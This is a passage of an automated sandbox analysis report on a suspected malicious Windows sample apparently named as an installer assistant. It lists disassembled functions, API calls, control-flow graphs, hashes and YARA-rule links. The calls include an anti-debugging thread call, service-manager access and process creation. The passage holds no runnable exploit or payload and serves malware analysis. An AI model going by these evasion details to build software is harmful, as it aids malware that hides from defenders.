                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C163EAA
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 3c38832d4c290676bb7b8cc67c4b0383b05c4859f304b8d777654b2266e4d7a2
                              • Instruction ID: 232cce74b09f3cb71c57677a8f240b6c661588b680b74d6b78dd4d78a5039e2f
                              • Opcode Fuzzy Hash: 3c38832d4c290676bb7b8cc67c4b0383b05c4859f304b8d777654b2266e4d7a2
                              • Instruction Fuzzy Hash: 0F2124701187018BC324CF75C8A07D6B7B6AF46308F994A5DC0A68BEC0DB74B4198B52
                              Function 6C2E5120 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C2E5130
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: 87383394ac6b539d3324ccc5873fb50e1bd37a32a6be47c52a6eeb23d19d1c87
                              • Instruction ID: 8648987c2800d13c8c0fdc9d8c38314a3c3f7a3d1df95f0c361e3698b78a0870
                              • Opcode Fuzzy Hash: 87383394ac6b539d3324ccc5873fb50e1bd37a32a6be47c52a6eeb23d19d1c87
                              • Instruction Fuzzy Hash: 56312AB4618346EFC7108F69C544B0ABBF0EB8D755F90896EF888DA360C375C9459B53
                              Function 6C2DAEC0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C2DAEDC
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 76d2b6d01244d654a18003e62736a3d2aa38b31892ff6994f10ec251023037ea
                              • Instruction ID: 7052b335ba57873911ac5dc31659454118f13f00eeeb192ac39822b2ab22b085
                              • Opcode Fuzzy Hash: 76d2b6d01244d654a18003e62736a3d2aa38b31892ff6994f10ec251023037ea
                              • Instruction Fuzzy Hash: A81166B0508345EFD7108B28D44480EBBE4BF9A315F598E99F8A8CB690D331EC848B63
                              Function 6C2BAA30 Relevance: 44.5, APIs: 3, Strings: 22, Instructions: 734fileCOMMON
                              Download Yara Rule
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C2BABA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 12d7202b4727147c402ba53e0fbde5016b20af32d4d47d581c95553a545b9b08
                              • Instruction ID: f5fc2618151c7dee6e76f54f4e30bbcaee803612c2c396c0aa2bdf947916e303
                              • Opcode Fuzzy Hash: 12d7202b4727147c402ba53e0fbde5016b20af32d4d47d581c95553a545b9b08
                              • Instruction Fuzzy Hash: B762497060D38ACFC724CF18C490A5ABBE2ABD9349F148D1EF9A9DB751D734D8458B42
                              Function 6C2FCAD3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6824 6c2fcad3-6c2fcae3 6825 6c2fcafd-6c2fcaff 6824->6825 6826 6c2fcae5-6c2fcaf8 call 6c2ef9df call 6c2ef9cc 6824->6826 6828 6c2fcb05-6c2fcb0b 6825->6828 6829 6c2fce64-6c2fce71 call 6c2ef9df call 6c2ef9cc 6825->6829 6840 6c2fce7c 6826->6840 6828->6829 6832 6c2fcb11-6c2fcb37 6828->6832 6847 6c2fce77 call 6c2f0120 6829->6847 6832->6829 6835 6c2fcb3d-6c2fcb46 6832->6835 6838 6c2fcb48-6c2fcb5b call 6c2ef9df call 6c2ef9cc 6835->6838 6839 6c2fcb60-6c2fcb62 6835->6839 6838->6847 6843 6c2fcb68-6c2fcb6b 6839->6843 6844 6c2fce60-6c2fce62 6839->6844 6846 6c2fce7f-6c2fce82 6840->6846 6843->6844 6845 6c2fcb71-6c2fcb75 6843->6845 6844->6846 6845->6838 6849 6c2fcb77-6c2fcb8e 6845->6849 6847->6840 6852 6c2fcbdf-6c2fcbe5 6849->6852 6853 6c2fcb90-6c2fcb93 6849->6853 6857 6c2fcbab-6c2fcbc2 call 6c2ef9df call 6c2ef9cc call 6c2f0120 6852->6857 6858 6c2fcbe7-6c2fcbf1 6852->6858 6855 6c2fcb95-6c2fcb9e 6853->6855 6856 6c2fcba3-6c2fcba9 6853->6856 6859 6c2fcc63-6c2fcc73 6855->6859 6856->6857 6860 6c2fcbc7-6c2fcbda 6856->6860 6890 6c2fcd97 6857->6890 6862 6c2fcbf8-6c2fcc16 call 6c2f47f5 call 6c2f47bb * 2 6858->6862 6863 6c2fcbf3-6c2fcbf5 6858->6863 6864 6c2fcc79-6c2fcc85 6859->6864 6865 6c2fcd38-6c2fcd41 call 6c3019e5 6859->6865 6860->6859 6894 6c2fcc18-6c2fcc2e call 6c2ef9cc call 6c2ef9df 6862->6894 6895 6c2fcc33-6c2fcc5c call 6c2fac69 6862->6895 6863->6862 6864->6865 6868 6c2fcc8b-6c2fcc8d 6864->6868 6879 6c2fcdb4 6865->6879 6880 6c2fcd43-6c2fcd55 6865->6880 6868->6865 6872 6c2fcc93-6c2fccb7 6868->6872 6872->6865 6876 6c2fccb9-6c2fcccf 6872->6876 6876->6865 6881 6c2fccd1-6c2fccd3 6876->6881 6883 6c2fcdb8-6c2fcdd0 ReadFile 6879->6883 6880->6879 6885 6c2fcd57-6c2fcd66 GetConsoleMode 6880->6885 6881->6865 6886 6c2fccd5-6c2fccfb 6881->6886 6888 6c2fce2c-6c2fce37 GetLastError 6883->6888 6889 6c2fcdd2-6c2fcdd8 6883->6889 6885->6879 6891 6c2fcd68-6c2fcd6c 6885->6891 6886->6865 6893 6c2fccfd-6c2fcd13 6886->6893 6896 6c2fce39-6c2fce4b call 6c2ef9cc call 6c2ef9df 6888->6896 6897 6c2fce50-6c2fce53 6888->6897 6889->6888 6898 6c2fcdda 6889->6898 6892 6c2fcd9a-6c2fcda4 call 6c2f47bb 6890->6892 6891->6883 6899 6c2fcd6e-6c2fcd88 ReadConsoleW 6891->6899 6892->6846 6893->6865 6905 6c2fcd15-6c2fcd17 6893->6905 6894->6890 6895->6859 6896->6890 6902 6c2fce59-6c2fce5b 6897->6902 6903 6c2fcd90-6c2fcd96 call 6c2ef9f2 6897->6903 6909 6c2fcddd-6c2fcdef 6898->6909 6900 6c2fcd8a GetLastError 6899->6900 6901 6c2fcda9-6c2fcdb2 6899->6901 6900->6903 6901->6909 6902->6892 6903->6890 6905->6865 6912 6c2fcd19-6c2fcd33 6905->6912 6909->6892 6916 6c2fcdf1-6c2fcdf5 6909->6916 6912->6865 6920 6c2fce0e-6c2fce19 6916->6920 6921 6c2fcdf7-6c2fce07 call 6c2fcefe 6916->6921 6923 6c2fce1b call 6c2fce83 6920->6923 6924 6c2fce25-6c2fce2a call 6c2fd1b6 6920->6924 6930 6c2fce0a-6c2fce0c 6921->6930 6931 6c2fce20-6c2fce23 6923->6931 6924->6931 6930->6892 6931->6930
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: be9c7c382f23c660fdb4b82a6bce29cad9593f21afd80cedae731e6c2862718d
                              • Instruction ID: 8a5534c41e32347e9317a55bbf8ecfc0cd4c6cab2d30261347d07b32a432c0ae
                              • Opcode Fuzzy Hash: be9c7c382f23c660fdb4b82a6bce29cad9593f21afd80cedae731e6c2862718d
                              • Instruction Fuzzy Hash: F9C1F674A8424EAFDB11EF98C880BADFBB4AF4A718F544159EC60A7B41C7719906CB60
                              Function 6C30406C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6933 6c30406c-6c30409c call 6c3044ec 6936 6c3040b7-6c3040c3 call 6c30160c 6933->6936 6937 6c30409e-6c3040a9 call 6c2ef9df 6933->6937 6943 6c3040c5-6c3040da call 6c2ef9df call 6c2ef9cc 6936->6943 6944 6c3040dc-6c304125 call 6c304457 6936->6944 6942 6c3040ab-6c3040b2 call 6c2ef9cc 6937->6942 6951 6c304391-6c304395 6942->6951 6943->6942 6953 6c304192-6c30419b GetFileType 6944->6953 6954 6c304127-6c304130 6944->6954 6955 6c3041e4-6c3041e7 6953->6955 6956 6c30419d-6c3041ce GetLastError call 6c2ef9f2 CloseHandle 6953->6956 6958 6c304132-6c304136 6954->6958 6959 6c304167-6c30418d GetLastError call 6c2ef9f2 6954->6959 6963 6c3041f0-6c3041f6 6955->6963 6964 6c3041e9-6c3041ee 6955->6964 6956->6942 6972 6c3041d4-6c3041df call 6c2ef9cc 6956->6972 6958->6959 6960 6c304138-6c304165 call 6c304457 6958->6960 6959->6942 6960->6953 6960->6959 6965 6c3041f8 6963->6965 6966 6c3041fa-6c304248 call 6c3017b0 6963->6966 6964->6966 6965->6966 6975 6c304267-6c30428f call 6c304710 6966->6975 6976 6c30424a-6c304256 call 6c304666 6966->6976 6972->6942 6983 6c304291-6c304292 6975->6983 6984 6c304294-6c3042d5 6975->6984 6976->6975 6982 6c304258 6976->6982 6987 6c30425a-6c304262 call 6c2fb925 6982->6987 6983->6987 6985 6c3042f6-6c304304 6984->6985 6986 6c3042d7-6c3042db 6984->6986 6989 6c30430a-6c30430e 6985->6989 6990 6c30438f 6985->6990 6986->6985 6988 6c3042dd-6c3042f1 6986->6988 6987->6951 6988->6985 6989->6990 6992 6c304310-6c304343 CloseHandle call 6c304457 6989->6992 6990->6951 6996 6c304345-6c304371 GetLastError call 6c2ef9f2 call 6c30171f 6992->6996 6997 6c304377-6c30438b 6992->6997 6996->6997 6997->6990
                              APIs
                                • Part of subcall function 6C304457: CreateFileW.KERNEL32(00000000,00000000,?,6C304115,?,?,00000000,?,6C304115,00000000,0000000C), ref: 6C304474
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C304180
                              • __dosmaperr.LIBCMT ref: 6C304187
                              • GetFileType.KERNEL32(00000000), ref: 6C304193
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C30419D
                              • __dosmaperr.LIBCMT ref: 6C3041A6
                              • CloseHandle.KERNEL32(00000000), ref: 6C3041C6
                              • CloseHandle.KERNEL32(6C2FB0D0), ref: 6C304313
                              • GetLastError.KERNEL32 ref: 6C304345
                              • __dosmaperr.LIBCMT ref: 6C30434C
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: 43ab95dff804f07fb5a60af84e5b6d5fceed88855d8131defaca56876ddb48cc
                              • Instruction ID: afcf42d0e3cdb4b3c1460b9997906c008f0f094fda53d77262536da79aa19031
                              • Opcode Fuzzy Hash: 43ab95dff804f07fb5a60af84e5b6d5fceed88855d8131defaca56876ddb48cc
                              • Instruction Fuzzy Hash: 38A15733B041489FCF09CF68D8417EE7BB5AB1B328F18025DE851AB781CB369A16CB51
                              Function 6C2BC1E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 183COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7002 6c2bc1e0-6c2bc239 call 6c2e6b70 7005 6c2bc260-6c2bc269 7002->7005 7006 6c2bc26b-6c2bc270 7005->7006 7007 6c2bc2b0-6c2bc2b5 7005->7007 7010 6c2bc272-6c2bc277 7006->7010 7011 6c2bc2f0-6c2bc2f5 7006->7011 7008 6c2bc330-6c2bc335 7007->7008 7009 6c2bc2b7-6c2bc2bc 7007->7009 7016 6c2bc33b-6c2bc340 7008->7016 7017 6c2bc489-6c2bc4b9 call 6c2eb3a0 7008->7017 7012 6c2bc2c2-6c2bc2c7 7009->7012 7013 6c2bc407-6c2bc41b 7009->7013 7018 6c2bc27d-6c2bc282 7010->7018 7019 6c2bc372-6c2bc3df WriteFile 7010->7019 7014 6c2bc2fb-6c2bc300 7011->7014 7015 6c2bc431-6c2bc448 WriteFile 7011->7015 7021 6c2bc23b-6c2bc250 7012->7021 7022 6c2bc2cd-6c2bc2d2 7012->7022 7020 6c2bc41f-6c2bc42c 7013->7020 7023 6c2bc452-6c2bc47f call 6c2eb920 ReadFile 7014->7023 7024 6c2bc306-6c2bc30b 7014->7024 7015->7023 7026 6c2bc4be-6c2bc4c3 7016->7026 7027 6c2bc346-6c2bc36d 7016->7027 7017->7005 7028 6c2bc3e9-6c2bc3fd WriteFile 7018->7028 7029 6c2bc288-6c2bc28d 7018->7029 7019->7028 7020->7005 7033 6c2bc253-6c2bc258 7021->7033 7022->7005 7030 6c2bc2d4-6c2bc2e7 7022->7030 7023->7017 7024->7005 7032 6c2bc311-6c2bc32b 7024->7032 7026->7005 7035 6c2bc4c9-6c2bc4d7 7026->7035 7027->7033 7028->7013 7029->7005 7036 6c2bc28f-6c2bc2aa 7029->7036 7030->7033 7032->7020 7033->7005 7036->7033
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: 120193f67989b48eb1e4817fcf13dd47753e3e1acea21a35299825fa796b5920
                              • Instruction ID: 33a2295ccf887c6d1d38deafe2e0ae27789d84e60d8ad860e23322ea66f0126a
                              • Opcode Fuzzy Hash: 120193f67989b48eb1e4817fcf13dd47753e3e1acea21a35299825fa796b5920
                              • Instruction Fuzzy Hash: 52717EB020834AAFD710DF54C480B5ABBF4FF8AB48F10492EF898E6651D771D9489B92
                              Function 6C2BB730 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 605COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: ad46d0d7584c376d0ef9c78473fe7620f2a97e0e36bfdd9f2cfdacd8d42ec5da
                              • Instruction ID: 2503a468e580a6502598d739bb5c53590b4e81bd11992fd2ddd53359c0dbb6ec
                              • Opcode Fuzzy Hash: ad46d0d7584c376d0ef9c78473fe7620f2a97e0e36bfdd9f2cfdacd8d42ec5da
                              • Instruction Fuzzy Hash: 3D42887561934A8FC754CF18C4C0A1ABBE1AFCA399F248D1EF9A5A7B20D634D845CB43
                              Function 6C164200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: 057b8c9312e60da379b6dd1a57eeb008a81fa6a82ce10850077db7f6e72e910e
                              • Instruction ID: bfbba51b359a80ef13f12e2c684cc0dfe47060e8a2a64d1f46f25d045616e5f9
                              • Opcode Fuzzy Hash: 057b8c9312e60da379b6dd1a57eeb008a81fa6a82ce10850077db7f6e72e910e
                              • Instruction Fuzzy Hash: EB03D431645B018FC738CF29C8D0696B7E3AFD532471ACB6DC0A64BA95DB78B44ACB50
                              Function 6C2E4FF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7579 6c2e4ff0-6c2e5077 CreateProcessA 7580 6c2e50ca-6c2e50d3 7579->7580 7581 6c2e50d5-6c2e50da 7580->7581 7582 6c2e50f0-6c2e510b 7580->7582 7583 6c2e50dc-6c2e50e1 7581->7583 7584 6c2e5080-6c2e50c2 WaitForSingleObject CloseHandle * 2 7581->7584 7582->7580 7583->7580 7585 6c2e50e3-6c2e5118 7583->7585 7584->7580
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: 246aa31c6d4cd7852e40f53c98867fd02e3fd4388b8dbdead8f1dd50acd6f4fa
                              • Instruction ID: d11a0c809b41a8f56023c63d5fe7f2e52d8b58f21b36ddb4ee6edda56f2494d1
                              • Opcode Fuzzy Hash: 246aa31c6d4cd7852e40f53c98867fd02e3fd4388b8dbdead8f1dd50acd6f4fa
                              • Instruction Fuzzy Hash: 713102708193808FD750DF29C198B6ABBF0EB8E318F405A1EF8D996250E7749588CF43
                              Function 6C2FBC5E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7587 6c2fbc5e-6c2fbc7a 7588 6c2fbe39 7587->7588 7589 6c2fbc80-6c2fbc82 7587->7589 7590 6c2fbe3b-6c2fbe3f 7588->7590 7591 6c2fbca4-6c2fbcc5 7589->7591 7592 6c2fbc84-6c2fbc97 call 6c2ef9df call 6c2ef9cc call 6c2f0120 7589->7592 7594 6c2fbccc-6c2fbcd2 7591->7594 7595 6c2fbcc7-6c2fbcca 7591->7595 7609 6c2fbc9c-6c2fbc9f 7592->7609 7594->7592 7597 6c2fbcd4-6c2fbcd9 7594->7597 7595->7594 7595->7597 7599 6c2fbcdb-6c2fbce7 call 6c2fac69 7597->7599 7600 6c2fbcea-6c2fbcfb call 6c2fbe40 7597->7600 7599->7600 7607 6c2fbcfd-6c2fbcff 7600->7607 7608 6c2fbd3c-6c2fbd4e 7600->7608 7610 6c2fbd26-6c2fbd32 call 6c2fbeb1 7607->7610 7611 6c2fbd01-6c2fbd09 7607->7611 7612 6c2fbd95-6c2fbdb7 WriteFile 7608->7612 7613 6c2fbd50-6c2fbd59 7608->7613 7609->7590 7623 6c2fbd37-6c2fbd3a 7610->7623 7614 6c2fbd0f-6c2fbd1c call 6c2fc25b 7611->7614 7615 6c2fbdcb-6c2fbdce 7611->7615 7617 6c2fbdb9-6c2fbdbf GetLastError 7612->7617 7618 6c2fbdc2 7612->7618 7619 6c2fbd5b-6c2fbd5e 7613->7619 7620 6c2fbd85-6c2fbd93 call 6c2fc2c3 7613->7620 7631 6c2fbd1f-6c2fbd21 7614->7631 7625 6c2fbdd1-6c2fbdd6 7615->7625 7617->7618 7624 6c2fbdc5-6c2fbdca 7618->7624 7626 6c2fbd75-6c2fbd83 call 6c2fc487 7619->7626 7627 6c2fbd60-6c2fbd63 7619->7627 7620->7623 7623->7631 7624->7615 7632 6c2fbdd8-6c2fbddd 7625->7632 7633 6c2fbe34-6c2fbe37 7625->7633 7626->7623 7627->7625 7634 6c2fbd65-6c2fbd73 call 6c2fc39e 7627->7634 7631->7624 7637 6c2fbddf-6c2fbde4 7632->7637 7638 6c2fbe09-6c2fbe15 7632->7638 7633->7590 7634->7623 7639 6c2fbdfd-6c2fbe04 call 6c2ef9f2 7637->7639 7640 6c2fbde6-6c2fbdf8 call 6c2ef9cc call 6c2ef9df 7637->7640 7642 6c2fbe1c-6c2fbe2f call 6c2ef9cc call 6c2ef9df 7638->7642 7643 6c2fbe17-6c2fbe1a 7638->7643 7639->7609 7640->7609 7642->7609 7643->7588 7643->7642
                              APIs
                                • Part of subcall function 6C2FBEB1: GetConsoleCP.KERNEL32(?,6C2FB0D0,?), ref: 6C2FBEF9
                              • WriteFile.KERNEL32(?,?,6C3046EC,00000000,00000000,?,00000000,00000000,6C305AB6,00000000,00000000,?,00000000,6C2FB0D0,6C3046EC,00000000), ref: 6C2FBDAF
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C3046EC,6C2FB0D0,00000000,?,?,?,?,00000000,?), ref: 6C2FBDB9
                              • __dosmaperr.LIBCMT ref: 6C2FBDFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
